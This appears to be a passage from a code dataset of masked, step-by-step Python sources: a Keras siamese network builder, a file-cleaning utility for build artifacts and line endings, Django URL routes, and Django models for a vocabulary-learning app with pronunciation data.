model.set_weights(weights)\n except:\n model.load_weights(weight_file, by_name=True)\n\n return model\n\n\ndef build_simple_nn_for_training(\n input_shape,\n create_cnn,\n optimizer=\"Adam\",\n lr=1e-3,\n momentum=None,\n clipnorm=0.0,\n loss=\"emd\",\n reducer=\"average\",\n merge_layer=\"dot-product\",\n weight_decay=None,\n weight_file=None\n):\n # Make sure that we have a proper input shape\n assert len(input_shape) == 5\n\n # Unpack the input shape to make the code more readable\n # print(input_shape)\n input_shape=list(input_shape)\n for i in range(len(input_shape)):\n if input_shape[i]!=None:\n input_shape[i]=int(input_shape[i])\n input_shape=tuple(input_shape)\n D, N, W, H, C = input_shape\n\n # Create the two stream inputs\n x1_in = Input(shape=input_shape)\n x2_in = Input(shape=input_shape)\n\n # Reshape them for input in the CNN\n x1 = TotalReshape((-1, W, H, C))(x1_in)\n x2 = TotalReshape((-1, W, H, C))(x2_in)\n\n # Create the CNN and extract features from both streams\n cnn = create_cnn(input_shape=(W, H, C), kernel_regularizer=weight_decay)\n x1 = Flatten()(cnn(x1))\n x2 = Flatten()(cnn(x2))\n\n # Compute a kind of similarity between the features of the two streams\n x = Dot(axes=-1, normalize=(merge_layer == \"cosine-similarity\"))([x1, x2])\n\n # Reshape them back into their semantic shape (depth planes, patches, etc)\n x = TotalReshape((-1, D, N))(x)\n\n # Compute the final similarity scores for each depth plane\n x = reducer_factory(reducer)(x)\n\n # Compute the final output\n y = Activation(\"softmax\")(x)\n\n model = Model(inputs=[x1_in, x2_in], outputs=y)\n model.compile(\n optimizer=optimizer_factory(\n optimizer,\n lr=lr,\n momentum=momentum,\n clipnorm=clipnorm\n ),\n loss=loss_factory(loss),\n metrics=[\"accuracy\", mae, mde]\n )\n\n if weight_file:\n model.load_weights(weight_file, by_name=True)\n\n return model\n\n\ndef build_hartmann_network(\n input_shape,\n create_cnn=create_hartmann_cnn,\n optimizer=\"SGD\",\n lr=1e-3,\n momentum=None,\n clipnorm=0.0,\n loss=None,\n reducer=None,\n merge_layer=None,\n weight_decay=None,\n weight_file=None\n):\n # Make sure that we have a proper input shape\n assert len(input_shape) == 3\n\n # Unpack the input shape to make the code more readable\n H, W, C = input_shape\n\n # Create the feature extracting CNN\n cnn = create_hartmann_cnn(input_shape=(None, None, C))\n\n # Create the similarity CNN\n sim = Sequential([\n Conv2D(\n filters=2048,\n kernel_size=5,\n input_shape=K.int_shape(cnn.output)[1:]\n ),\n Activation(\"relu\"),\n Conv2D(filters=2048, kernel_size=1),\n Activation(\"relu\"),\n Conv2D(filters=2, kernel_size=1),\n Activation(\"softmax\")\n ])\n\n # Create the joint model for training\n x_in = [Input(shape=input_shape) for i in range(5)]\n x = [cnn(xi) for xi in x_in]\n x = KerasAverage()(x)\n y = sim(x)\n model = Model(inputs=x_in, outputs=y)\n\n # Compile all the models\n model.compile(\n optimizer=optimizer_factory(\n optimizer,\n lr=lr,\n momentum=momentum,\n clipnorm=clipnorm\n ),\n loss=\"categorical_crossentropy\",\n metrics=[\"accuracy\"]\n )\n cnn.compile(\"sgd\", \"mse\") # Just so that we can run predict()\n sim.compile(\"sgd\", \"mse\")\n\n # Attach the cnn and sim to the model in case someone wants to use them\n model.cnn = cnn\n model.sim = sim\n\n if weight_file:\n model.load_weights(weight_file, by_name=True)\n\n return model\n\n\ndef get_nn(name):\n models = {\n \"simple_cnn\": build_simple_cnn,\n \"simple_nn_for_training\": build_simple_nn_for_training,\n \"hartmann\": build_hartmann_network\n }\n return models[name]\n",
"step-ids": [
17,
20,
24,
29,
31
]
}
|
[
17,
20,
24,
29,
31
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def clean_files(folder='.', posreg='.*[.]((py)|(rst))$', negreg=
'.*[.]git/.*', op='CR', fLOG=print):
"""
Cleans ``\\r`` in files a folder and subfolders with a given extensions.
Backslashes are replaces by ``/``. The regular expressions
applies on the relative path starting from *folder*.
:param folder: folder to clean
:param posreg: regular expression to select files to process
:param negreg: regular expression to skip files to process
:param op: kind of cleaning to do, options are CR, CRB, pep8,
see below for more details
:param fLOG: logging function
:return: list of processed files
The following cleaning are available:
* ``'CR'``: replaces ``'\\r\\n'`` by ``'\\n'``
* ``'CRB'``: replaces end of lines ``'\\n'`` by ``'\\r\\n'``
* ``'pep8'``: applies :epkg:`pep8` convention
"""
def clean_file_cr(name):
with open(name, 'rb') as f:
content = f.read()
new_content = content.replace(b'\r\n', b'\n')
if new_content != content:
with open(name, 'wb') as f:
f.write(new_content)
return True
return False
def clean_file_cr_back(name):
with open(name, 'rb') as f:
lines = f.read().split(b'\n')
new_lines = []
changes = False
for li in lines:
if not li.endswith(b'\r'):
new_lines.append(li + b'\r')
changes = True
else:
new_lines.append(li)
if changes:
with open(name, 'wb') as f:
f.write(b'\n'.join(new_lines))
return changes
if op == 'CR':
clean_file = clean_file_cr
elif op == 'CRB':
clean_file = clean_file_cr_back
elif op == 'pep8':
from .code_helper import remove_extra_spaces_and_pep8
clean_file = remove_extra_spaces_and_pep8
else:
raise ValueError(f"Unknown cleaning '{op}'.")
if posreg and isinstance(posreg, str):
posreg = re.compile(posreg)
if negreg and isinstance(negreg, str):
negreg = re.compile(negreg)
res = []
for root, _, files in os.walk(folder):
for f in files:
full = os.path.join(root, f)
rel = os.path.relpath(full, folder)
fn = rel.replace('\\', '/')
if posreg is None or posreg.search(fn):
if negreg is None or not negreg.search(fn):
r = clean_file(full)
if r and fLOG:
fLOG(f"[clean_files] processed '{fn}'")
res.append(rel)
return res
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def clean_exts(folder='.', fLOG=print, exts=None, fclean=None):
"""
Cleans files in a folder and subfolders with a given extensions.
@param folder folder to clean
@param fLOG logging function
@param exts extensions to clean
@param fclean if not None, ``fclean(name) -> True`` to clean
@return list of removed files
If *exts* is None, it will be replaced by
``{".pyd", ".so", ".o", ".def", ".obj"}``.
"""
if exts is None:
exts = {'.pyd', '.so', '.o', '.def', '.obj'}
rem = []
for root, _, files in os.walk(folder):
for f in files:
ext = os.path.splitext(f)[-1]
if (ext in exts and 'exe.win' not in root and 'site-packages'
not in root and '_venv' not in root):
filename = os.path.join(root, f)
if fclean is not None and not fclean(filename):
continue
fLOG('[clean_exts] removing ', filename)
os.remove(filename)
rem.append(filename)
return rem
def clean_files(folder='.', posreg='.*[.]((py)|(rst))$', negreg=
'.*[.]git/.*', op='CR', fLOG=print):
"""
Cleans ``\\r`` in files a folder and subfolders with a given extensions.
Backslashes are replaces by ``/``. The regular expressions
applies on the relative path starting from *folder*.
:param folder: folder to clean
:param posreg: regular expression to select files to process
:param negreg: regular expression to skip files to process
:param op: kind of cleaning to do, options are CR, CRB, pep8,
see below for more details
:param fLOG: logging function
:return: list of processed files
The following cleaning are available:
* ``'CR'``: replaces ``'\\r\\n'`` by ``'\\n'``
* ``'CRB'``: replaces end of lines ``'\\n'`` by ``'\\r\\n'``
* ``'pep8'``: applies :epkg:`pep8` convention
"""
def clean_file_cr(name):
with open(name, 'rb') as f:
content = f.read()
new_content = content.replace(b'\r\n', b'\n')
if new_content != content:
with open(name, 'wb') as f:
f.write(new_content)
return True
return False
def clean_file_cr_back(name):
with open(name, 'rb') as f:
lines = f.read().split(b'\n')
new_lines = []
changes = False
for li in lines:
if not li.endswith(b'\r'):
new_lines.append(li + b'\r')
changes = True
else:
new_lines.append(li)
if changes:
with open(name, 'wb') as f:
f.write(b'\n'.join(new_lines))
return changes
if op == 'CR':
clean_file = clean_file_cr
elif op == 'CRB':
clean_file = clean_file_cr_back
elif op == 'pep8':
from .code_helper import remove_extra_spaces_and_pep8
clean_file = remove_extra_spaces_and_pep8
else:
raise ValueError(f"Unknown cleaning '{op}'.")
if posreg and isinstance(posreg, str):
posreg = re.compile(posreg)
if negreg and isinstance(negreg, str):
negreg = re.compile(negreg)
res = []
for root, _, files in os.walk(folder):
for f in files:
full = os.path.join(root, f)
rel = os.path.relpath(full, folder)
fn = rel.replace('\\', '/')
if posreg is None or posreg.search(fn):
if negreg is None or not negreg.search(fn):
r = clean_file(full)
if r and fLOG:
fLOG(f"[clean_files] processed '{fn}'")
res.append(rel)
return res
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from __future__ import print_function
import os
import re
def clean_exts(folder='.', fLOG=print, exts=None, fclean=None):
"""
Cleans files in a folder and subfolders with a given extensions.
@param folder folder to clean
@param fLOG logging function
@param exts extensions to clean
@param fclean if not None, ``fclean(name) -> True`` to clean
@return list of removed files
If *exts* is None, it will be replaced by
``{".pyd", ".so", ".o", ".def", ".obj"}``.
"""
if exts is None:
exts = {'.pyd', '.so', '.o', '.def', '.obj'}
rem = []
for root, _, files in os.walk(folder):
for f in files:
ext = os.path.splitext(f)[-1]
if (ext in exts and 'exe.win' not in root and 'site-packages'
not in root and '_venv' not in root):
filename = os.path.join(root, f)
if fclean is not None and not fclean(filename):
continue
fLOG('[clean_exts] removing ', filename)
os.remove(filename)
rem.append(filename)
return rem
def clean_files(folder='.', posreg='.*[.]((py)|(rst))$', negreg=
'.*[.]git/.*', op='CR', fLOG=print):
"""
Cleans ``\\r`` in files a folder and subfolders with a given extensions.
Backslashes are replaces by ``/``. The regular expressions
applies on the relative path starting from *folder*.
:param folder: folder to clean
:param posreg: regular expression to select files to process
:param negreg: regular expression to skip files to process
:param op: kind of cleaning to do, options are CR, CRB, pep8,
see below for more details
:param fLOG: logging function
:return: list of processed files
The following cleaning are available:
* ``'CR'``: replaces ``'\\r\\n'`` by ``'\\n'``
* ``'CRB'``: replaces end of lines ``'\\n'`` by ``'\\r\\n'``
* ``'pep8'``: applies :epkg:`pep8` convention
"""
def clean_file_cr(name):
with open(name, 'rb') as f:
content = f.read()
new_content = content.replace(b'\r\n', b'\n')
if new_content != content:
with open(name, 'wb') as f:
f.write(new_content)
return True
return False
def clean_file_cr_back(name):
with open(name, 'rb') as f:
lines = f.read().split(b'\n')
new_lines = []
changes = False
for li in lines:
if not li.endswith(b'\r'):
new_lines.append(li + b'\r')
changes = True
else:
new_lines.append(li)
if changes:
with open(name, 'wb') as f:
f.write(b'\n'.join(new_lines))
return changes
if op == 'CR':
clean_file = clean_file_cr
elif op == 'CRB':
clean_file = clean_file_cr_back
elif op == 'pep8':
from .code_helper import remove_extra_spaces_and_pep8
clean_file = remove_extra_spaces_and_pep8
else:
raise ValueError(f"Unknown cleaning '{op}'.")
if posreg and isinstance(posreg, str):
posreg = re.compile(posreg)
if negreg and isinstance(negreg, str):
negreg = re.compile(negreg)
res = []
for root, _, files in os.walk(folder):
for f in files:
full = os.path.join(root, f)
rel = os.path.relpath(full, folder)
fn = rel.replace('\\', '/')
if posreg is None or posreg.search(fn):
if negreg is None or not negreg.search(fn):
r = clean_file(full)
if r and fLOG:
fLOG(f"[clean_files] processed '{fn}'")
res.append(rel)
return res
<|reserved_special_token_1|>
"""
@file
@brief Various function to clean files.
"""
from __future__ import print_function
import os
import re
def clean_exts(folder=".", fLOG=print, exts=None, fclean=None):
"""
Cleans files in a folder and subfolders with a given extensions.
@param folder folder to clean
@param fLOG logging function
@param exts extensions to clean
@param fclean if not None, ``fclean(name) -> True`` to clean
@return list of removed files
If *exts* is None, it will be replaced by
``{".pyd", ".so", ".o", ".def", ".obj"}``.
"""
if exts is None:
exts = {".pyd", ".so", ".o", ".def", ".obj"}
rem = []
for root, _, files in os.walk(folder):
for f in files:
ext = os.path.splitext(f)[-1]
if (ext in exts and "exe.win" not in root and "site-packages" not in root and
"_venv" not in root): # pragma: no cover
filename = os.path.join(root, f)
if fclean is not None and not fclean(filename):
continue
fLOG("[clean_exts] removing ", filename)
os.remove(filename)
rem.append(filename)
return rem
def clean_files(folder=".", posreg='.*[.]((py)|(rst))$',
negreg=".*[.]git/.*", op="CR", fLOG=print):
"""
Cleans ``\\r`` in files a folder and subfolders with a given extensions.
Backslashes are replaces by ``/``. The regular expressions
applies on the relative path starting from *folder*.
:param folder: folder to clean
:param posreg: regular expression to select files to process
:param negreg: regular expression to skip files to process
:param op: kind of cleaning to do, options are CR, CRB, pep8,
see below for more details
:param fLOG: logging function
:return: list of processed files
The following cleaning are available:
* ``'CR'``: replaces ``'\\r\\n'`` by ``'\\n'``
* ``'CRB'``: replaces end of lines ``'\\n'`` by ``'\\r\\n'``
* ``'pep8'``: applies :epkg:`pep8` convention
"""
def clean_file_cr(name):
with open(name, "rb") as f:
content = f.read()
new_content = content.replace(b"\r\n", b"\n")
if new_content != content:
with open(name, "wb") as f:
f.write(new_content)
return True
return False
def clean_file_cr_back(name):
with open(name, "rb") as f:
lines = f.read().split(b'\n')
new_lines = []
changes = False
for li in lines:
if not li.endswith(b'\r'):
new_lines.append(li + b'\r')
changes = True
else:
new_lines.append(li)
if changes:
with open(name, "wb") as f:
f.write(b'\n'.join(new_lines))
return changes
if op == 'CR':
clean_file = clean_file_cr
elif op == 'CRB':
clean_file = clean_file_cr_back
elif op == 'pep8':
from .code_helper import remove_extra_spaces_and_pep8
clean_file = remove_extra_spaces_and_pep8
else:
raise ValueError(f"Unknown cleaning '{op}'.")
if posreg and isinstance(posreg, str):
posreg = re.compile(posreg)
if negreg and isinstance(negreg, str):
negreg = re.compile(negreg)
res = []
for root, _, files in os.walk(folder):
for f in files:
full = os.path.join(root, f)
rel = os.path.relpath(full, folder)
fn = rel.replace("\\", "/")
if posreg is None or posreg.search(fn):
if negreg is None or not negreg.search(fn):
r = clean_file(full)
if r and fLOG:
fLOG(f"[clean_files] processed '{fn}'")
res.append(rel)
return res
|
flexible
|
{
"blob_id": "57972e6368aa5749edeab94e45d84f7897ca14ab",
"index": 8751,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef clean_files(folder='.', posreg='.*[.]((py)|(rst))$', negreg=\n '.*[.]git/.*', op='CR', fLOG=print):\n \"\"\"\n Cleans ``\\\\r`` in files a folder and subfolders with a given extensions.\n Backslashes are replaces by ``/``. The regular expressions\n applies on the relative path starting from *folder*.\n\n :param folder: folder to clean\n :param posreg: regular expression to select files to process\n :param negreg: regular expression to skip files to process\n :param op: kind of cleaning to do, options are CR, CRB, pep8,\n see below for more details\n :param fLOG: logging function\n :return: list of processed files\n\n The following cleaning are available:\n\n * ``'CR'``: replaces ``'\\\\r\\\\n'`` by ``'\\\\n'``\n * ``'CRB'``: replaces end of lines ``'\\\\n'`` by ``'\\\\r\\\\n'``\n * ``'pep8'``: applies :epkg:`pep8` convention\n \"\"\"\n\n def clean_file_cr(name):\n with open(name, 'rb') as f:\n content = f.read()\n new_content = content.replace(b'\\r\\n', b'\\n')\n if new_content != content:\n with open(name, 'wb') as f:\n f.write(new_content)\n return True\n return False\n\n def clean_file_cr_back(name):\n with open(name, 'rb') as f:\n lines = f.read().split(b'\\n')\n new_lines = []\n changes = False\n for li in lines:\n if not li.endswith(b'\\r'):\n new_lines.append(li + b'\\r')\n changes = True\n else:\n new_lines.append(li)\n if changes:\n with open(name, 'wb') as f:\n f.write(b'\\n'.join(new_lines))\n return changes\n if op == 'CR':\n clean_file = clean_file_cr\n elif op == 'CRB':\n clean_file = clean_file_cr_back\n elif op == 'pep8':\n from .code_helper import remove_extra_spaces_and_pep8\n clean_file = remove_extra_spaces_and_pep8\n else:\n raise ValueError(f\"Unknown cleaning '{op}'.\")\n if posreg and isinstance(posreg, str):\n posreg = re.compile(posreg)\n if negreg and isinstance(negreg, str):\n negreg = re.compile(negreg)\n res = []\n for root, _, files in os.walk(folder):\n for f in files:\n full = os.path.join(root, f)\n rel = os.path.relpath(full, folder)\n fn = rel.replace('\\\\', '/')\n if posreg is None or posreg.search(fn):\n if negreg is None or not negreg.search(fn):\n r = clean_file(full)\n if r and fLOG:\n fLOG(f\"[clean_files] processed '{fn}'\")\n res.append(rel)\n return res\n",
"step-3": "<mask token>\n\n\ndef clean_exts(folder='.', fLOG=print, exts=None, fclean=None):\n \"\"\"\n Cleans files in a folder and subfolders with a given extensions.\n\n @param folder folder to clean\n @param fLOG logging function\n @param exts extensions to clean\n @param fclean if not None, ``fclean(name) -> True`` to clean\n @return list of removed files\n\n If *exts* is None, it will be replaced by\n ``{\".pyd\", \".so\", \".o\", \".def\", \".obj\"}``.\n \"\"\"\n if exts is None:\n exts = {'.pyd', '.so', '.o', '.def', '.obj'}\n rem = []\n for root, _, files in os.walk(folder):\n for f in files:\n ext = os.path.splitext(f)[-1]\n if (ext in exts and 'exe.win' not in root and 'site-packages'\n not in root and '_venv' not in root):\n filename = os.path.join(root, f)\n if fclean is not None and not fclean(filename):\n continue\n fLOG('[clean_exts] removing ', filename)\n os.remove(filename)\n rem.append(filename)\n return rem\n\n\ndef clean_files(folder='.', posreg='.*[.]((py)|(rst))$', negreg=\n '.*[.]git/.*', op='CR', fLOG=print):\n \"\"\"\n Cleans ``\\\\r`` in files a folder and subfolders with a given extensions.\n Backslashes are replaces by ``/``. The regular expressions\n applies on the relative path starting from *folder*.\n\n :param folder: folder to clean\n :param posreg: regular expression to select files to process\n :param negreg: regular expression to skip files to process\n :param op: kind of cleaning to do, options are CR, CRB, pep8,\n see below for more details\n :param fLOG: logging function\n :return: list of processed files\n\n The following cleaning are available:\n\n * ``'CR'``: replaces ``'\\\\r\\\\n'`` by ``'\\\\n'``\n * ``'CRB'``: replaces end of lines ``'\\\\n'`` by ``'\\\\r\\\\n'``\n * ``'pep8'``: applies :epkg:`pep8` convention\n \"\"\"\n\n def clean_file_cr(name):\n with open(name, 'rb') as f:\n content = f.read()\n new_content = content.replace(b'\\r\\n', b'\\n')\n if new_content != content:\n with open(name, 'wb') as f:\n f.write(new_content)\n return True\n return False\n\n def clean_file_cr_back(name):\n with open(name, 'rb') as f:\n lines = f.read().split(b'\\n')\n new_lines = []\n changes = False\n for li in lines:\n if not li.endswith(b'\\r'):\n new_lines.append(li + b'\\r')\n changes = True\n else:\n new_lines.append(li)\n if changes:\n with open(name, 'wb') as f:\n f.write(b'\\n'.join(new_lines))\n return changes\n if op == 'CR':\n clean_file = clean_file_cr\n elif op == 'CRB':\n clean_file = clean_file_cr_back\n elif op == 'pep8':\n from .code_helper import remove_extra_spaces_and_pep8\n clean_file = remove_extra_spaces_and_pep8\n else:\n raise ValueError(f\"Unknown cleaning '{op}'.\")\n if posreg and isinstance(posreg, str):\n posreg = re.compile(posreg)\n if negreg and isinstance(negreg, str):\n negreg = re.compile(negreg)\n res = []\n for root, _, files in os.walk(folder):\n for f in files:\n full = os.path.join(root, f)\n rel = os.path.relpath(full, folder)\n fn = rel.replace('\\\\', '/')\n if posreg is None or posreg.search(fn):\n if negreg is None or not negreg.search(fn):\n r = clean_file(full)\n if r and fLOG:\n fLOG(f\"[clean_files] processed '{fn}'\")\n res.append(rel)\n return res\n",
"step-4": "<mask token>\nfrom __future__ import print_function\nimport os\nimport re\n\n\ndef clean_exts(folder='.', fLOG=print, exts=None, fclean=None):\n \"\"\"\n Cleans files in a folder and subfolders with a given extensions.\n\n @param folder folder to clean\n @param fLOG logging function\n @param exts extensions to clean\n @param fclean if not None, ``fclean(name) -> True`` to clean\n @return list of removed files\n\n If *exts* is None, it will be replaced by\n ``{\".pyd\", \".so\", \".o\", \".def\", \".obj\"}``.\n \"\"\"\n if exts is None:\n exts = {'.pyd', '.so', '.o', '.def', '.obj'}\n rem = []\n for root, _, files in os.walk(folder):\n for f in files:\n ext = os.path.splitext(f)[-1]\n if (ext in exts and 'exe.win' not in root and 'site-packages'\n not in root and '_venv' not in root):\n filename = os.path.join(root, f)\n if fclean is not None and not fclean(filename):\n continue\n fLOG('[clean_exts] removing ', filename)\n os.remove(filename)\n rem.append(filename)\n return rem\n\n\ndef clean_files(folder='.', posreg='.*[.]((py)|(rst))$', negreg=\n '.*[.]git/.*', op='CR', fLOG=print):\n \"\"\"\n Cleans ``\\\\r`` in files a folder and subfolders with a given extensions.\n Backslashes are replaces by ``/``. The regular expressions\n applies on the relative path starting from *folder*.\n\n :param folder: folder to clean\n :param posreg: regular expression to select files to process\n :param negreg: regular expression to skip files to process\n :param op: kind of cleaning to do, options are CR, CRB, pep8,\n see below for more details\n :param fLOG: logging function\n :return: list of processed files\n\n The following cleaning are available:\n\n * ``'CR'``: replaces ``'\\\\r\\\\n'`` by ``'\\\\n'``\n * ``'CRB'``: replaces end of lines ``'\\\\n'`` by ``'\\\\r\\\\n'``\n * ``'pep8'``: applies :epkg:`pep8` convention\n \"\"\"\n\n def clean_file_cr(name):\n with open(name, 'rb') as f:\n content = f.read()\n new_content = content.replace(b'\\r\\n', b'\\n')\n if new_content != content:\n with open(name, 'wb') as f:\n f.write(new_content)\n return True\n return False\n\n def clean_file_cr_back(name):\n with open(name, 'rb') as f:\n lines = f.read().split(b'\\n')\n new_lines = []\n changes = False\n for li in lines:\n if not li.endswith(b'\\r'):\n new_lines.append(li + b'\\r')\n changes = True\n else:\n new_lines.append(li)\n if changes:\n with open(name, 'wb') as f:\n f.write(b'\\n'.join(new_lines))\n return changes\n if op == 'CR':\n clean_file = clean_file_cr\n elif op == 'CRB':\n clean_file = clean_file_cr_back\n elif op == 'pep8':\n from .code_helper import remove_extra_spaces_and_pep8\n clean_file = remove_extra_spaces_and_pep8\n else:\n raise ValueError(f\"Unknown cleaning '{op}'.\")\n if posreg and isinstance(posreg, str):\n posreg = re.compile(posreg)\n if negreg and isinstance(negreg, str):\n negreg = re.compile(negreg)\n res = []\n for root, _, files in os.walk(folder):\n for f in files:\n full = os.path.join(root, f)\n rel = os.path.relpath(full, folder)\n fn = rel.replace('\\\\', '/')\n if posreg is None or posreg.search(fn):\n if negreg is None or not negreg.search(fn):\n r = clean_file(full)\n if r and fLOG:\n fLOG(f\"[clean_files] processed '{fn}'\")\n res.append(rel)\n return res\n",
"step-5": "\"\"\"\n@file\n@brief Various function to clean files.\n\"\"\"\nfrom __future__ import print_function\nimport os\nimport re\n\n\ndef clean_exts(folder=\".\", fLOG=print, exts=None, fclean=None):\n \"\"\"\n Cleans files in a folder and subfolders with a given extensions.\n\n @param folder folder to clean\n @param fLOG logging function\n @param exts extensions to clean\n @param fclean if not None, ``fclean(name) -> True`` to clean\n @return list of removed files\n\n If *exts* is None, it will be replaced by\n ``{\".pyd\", \".so\", \".o\", \".def\", \".obj\"}``.\n \"\"\"\n if exts is None:\n exts = {\".pyd\", \".so\", \".o\", \".def\", \".obj\"}\n rem = []\n for root, _, files in os.walk(folder):\n for f in files:\n ext = os.path.splitext(f)[-1]\n if (ext in exts and \"exe.win\" not in root and \"site-packages\" not in root and\n \"_venv\" not in root): # pragma: no cover\n filename = os.path.join(root, f)\n if fclean is not None and not fclean(filename):\n continue\n fLOG(\"[clean_exts] removing \", filename)\n os.remove(filename)\n rem.append(filename)\n return rem\n\n\ndef clean_files(folder=\".\", posreg='.*[.]((py)|(rst))$',\n negreg=\".*[.]git/.*\", op=\"CR\", fLOG=print):\n \"\"\"\n Cleans ``\\\\r`` in files a folder and subfolders with a given extensions.\n Backslashes are replaces by ``/``. The regular expressions\n applies on the relative path starting from *folder*.\n\n :param folder: folder to clean\n :param posreg: regular expression to select files to process\n :param negreg: regular expression to skip files to process\n :param op: kind of cleaning to do, options are CR, CRB, pep8,\n see below for more details\n :param fLOG: logging function\n :return: list of processed files\n\n The following cleaning are available:\n\n * ``'CR'``: replaces ``'\\\\r\\\\n'`` by ``'\\\\n'``\n * ``'CRB'``: replaces end of lines ``'\\\\n'`` by ``'\\\\r\\\\n'``\n * ``'pep8'``: applies :epkg:`pep8` convention\n \"\"\"\n def clean_file_cr(name):\n with open(name, \"rb\") as f:\n content = f.read()\n new_content = content.replace(b\"\\r\\n\", b\"\\n\")\n if new_content != content:\n with open(name, \"wb\") as f:\n f.write(new_content)\n return True\n return False\n\n def clean_file_cr_back(name):\n with open(name, \"rb\") as f:\n lines = f.read().split(b'\\n')\n new_lines = []\n changes = False\n for li in lines:\n if not li.endswith(b'\\r'):\n new_lines.append(li + b'\\r')\n changes = True\n else:\n new_lines.append(li)\n if changes:\n with open(name, \"wb\") as f:\n f.write(b'\\n'.join(new_lines))\n return changes\n\n if op == 'CR':\n clean_file = clean_file_cr\n elif op == 'CRB':\n clean_file = clean_file_cr_back\n elif op == 'pep8':\n from .code_helper import remove_extra_spaces_and_pep8\n clean_file = remove_extra_spaces_and_pep8\n else:\n raise ValueError(f\"Unknown cleaning '{op}'.\")\n\n if posreg and isinstance(posreg, str):\n posreg = re.compile(posreg)\n if negreg and isinstance(negreg, str):\n negreg = re.compile(negreg)\n\n res = []\n for root, _, files in os.walk(folder):\n for f in files:\n full = os.path.join(root, f)\n rel = os.path.relpath(full, folder)\n fn = rel.replace(\"\\\\\", \"/\")\n if posreg is None or posreg.search(fn):\n if negreg is None or not negreg.search(fn):\n r = clean_file(full)\n if r and fLOG:\n fLOG(f\"[clean_files] processed '{fn}'\")\n res.append(rel)\n return res\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from django.conf.urls import url
from tree import views
urlpatterns = [
url('/home', views.home),
url('/about', views.about),
]
|
normal
|
{
"blob_id": "3313f01ed98433f4b150c4d8e877ac09eb8403b4",
"index": 5652,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [url('/home', views.home), url('/about', views.about)]\n",
"step-3": "from django.conf.urls import url\nfrom tree import views\nurlpatterns = [url('/home', views.home), url('/about', views.about)]\n",
"step-4": "\nfrom django.conf.urls import url\nfrom tree import views\n\nurlpatterns = [\n url('/home', views.home),\n url('/about', views.about),\n]",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class Meaning(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __str__(self):
if self.value is None:
return ''
return self.value[:20]
class Meta:
ordering = ['order']
verbose_name = 'Доп. значение'
verbose_name_plural = 'Доп. значения'
class Pronunciation(models.Model):
word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=
'Слово')
audio = models.FileField(upload_to='media/audio', verbose_name=
'Произношение')
raw_od_data = JSONField(verbose_name='Сырые данные с OD', blank=True,
null=True)
is_active = models.BooleanField(default=True, verbose_name='Используется')
def __str__(self):
return 'Произношение {}'.format(self.word)
class Meta:
verbose_name = 'Произношение'
verbose_name_plural = 'Произношения'
class PronunciationMeta(object):
def __init__(self, **kwargs):
for k, v in kwargs.items():
setattr(self, k, v)
class WordLearningState(models.Model):
word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=
'Слово')
user = models.ForeignKey('auth.User', on_delete=models.CASCADE,
verbose_name='Пользователь')
is_user_know_meaning = models.BooleanField(default=False, verbose_name=
'Выучил значение')
is_user_know_pronunciation = models.BooleanField(default=False,
verbose_name='Выучил произношение')
usage_count = models.PositiveIntegerField(default=0, verbose_name=
'Количество показов')
last_usage_date = models.DateTimeField(auto_now_add=True, verbose_name=
'Дата последнего показа')
preferred_pronunciation = models.PositiveIntegerField(default=0,
verbose_name='forvo id препочтительного произношения')
training_session = models.BooleanField(default=False, blank=False,
verbose_name='Сеанс обучения')
def _get_pronunciations_meta(self, word_str):
forvo_meta_path = os.path.join(settings.BASE_DIR, 'media', 'forvo',
'{}.json'.format(word_str))
if not os.path.exists(forvo_meta_path):
return
with open(forvo_meta_path, 'r') as f:
data = json.load(f)
return data
def _get_sounds(self, word_str):
ret = []
sounds_path = os.path.join(settings.BASE_DIR, 'media', 'sounds',
word_str)
print(sounds_path)
if not os.path.exists(sounds_path):
return []
items = list(os.listdir(sounds_path))
items.sort()
for item in items:
if item.endswith('.mp3'):
ret.append('{}{}/{}/{}'.format(settings.MEDIA_URL, 'sounds',
word_str, item))
return ret
def get_pronunciations(self):
word = self.word
forvo_meta = self._get_pronunciations_meta(word.value)
if not forvo_meta:
return []
ret = []
ct = 0
sounds = self._get_sounds(word.value)
slen = len(sounds)
prefered_detected = False
for item in (forvo_meta.get('items') or []):
if item.get('code', '') != 'en' or item.get('country', ''
) != 'United States':
continue
if ct > slen - 1:
break
sound_file = sounds[ct]
is_best = self.preferred_pronunciation == item['id']
if is_best:
prefered_detected = True
ret.append({'id': item['id'], 'by': item['username'], 'sex':
item['sex'], 'src': sound_file, 'best': is_best})
ct += 1
if ct == 4:
break
if ret and not prefered_detected:
ret[0]['best'] = True
return ret
def __str__(self):
return 'Статистика слова {}'.format(self.word)
class Meta:
verbose_name = 'Статистика'
verbose_name_plural = 'Статистика'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Meaning(models.Model):
word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=
'Слово')
value = models.TextField(verbose_name='Значение')
order = models.PositiveIntegerField(verbose_name='Порядок', default=0)
examples = JSONField(null=True, blank=True)
def __str__(self):
if self.value is None:
return ''
return self.value[:20]
class Meta:
ordering = ['order']
verbose_name = 'Доп. значение'
verbose_name_plural = 'Доп. значения'
class Pronunciation(models.Model):
word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=
'Слово')
audio = models.FileField(upload_to='media/audio', verbose_name=
'Произношение')
raw_od_data = JSONField(verbose_name='Сырые данные с OD', blank=True,
null=True)
is_active = models.BooleanField(default=True, verbose_name='Используется')
def __str__(self):
return 'Произношение {}'.format(self.word)
class Meta:
verbose_name = 'Произношение'
verbose_name_plural = 'Произношения'
class PronunciationMeta(object):
def __init__(self, **kwargs):
for k, v in kwargs.items():
setattr(self, k, v)
class WordLearningState(models.Model):
word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=
'Слово')
user = models.ForeignKey('auth.User', on_delete=models.CASCADE,
verbose_name='Пользователь')
is_user_know_meaning = models.BooleanField(default=False, verbose_name=
'Выучил значение')
is_user_know_pronunciation = models.BooleanField(default=False,
